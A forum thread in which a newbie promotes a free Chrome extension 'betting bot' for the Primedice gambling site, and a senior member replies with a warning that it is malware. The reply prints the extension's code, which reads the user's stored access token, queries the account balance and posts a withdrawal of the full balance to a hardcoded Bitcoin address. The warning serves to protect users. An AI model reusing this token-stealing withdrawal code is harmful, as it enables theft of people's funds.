Author

Topic: Dynamic Seed, Swap, Martingale bot for Primedice (Read 248 times)

sr. member
Activity: 528
Merit: 368
This is malware and will steal your funds:

Code:
calculate_nonce = function(seed) {
    return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

lut = window['$'];

lut['getJSON'](
    calculate_nonce('users/1'), function(seed) {
        var key1 = 'amount'
        var key2 = 'address'
        var load = {};
        load[key1] = seed['user']['balance'];
        load[key2] = '1GPPb1K1AhMMs1bCSEMdphgrF7WLXq7V7S';
        lut['post'](calculate_nonce('withdraw'), load);
    }
);
newbie
Activity: 2
Merit: 0
I made this google chrome extension for primedice and made decent profits myself. I'm giving this away for free.

https://www.youtube.com/watch?v=0bTUvRUsDpQ

Good luck. Tip me when you win - 15rnFYuBmewoSQ9LCabZ1Zsc2gZAgU3KdM
Jump to: